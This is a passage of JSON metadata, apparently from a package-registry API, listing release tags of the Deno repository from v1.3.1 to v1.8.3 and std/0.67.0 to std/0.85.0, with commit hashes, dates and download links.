deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms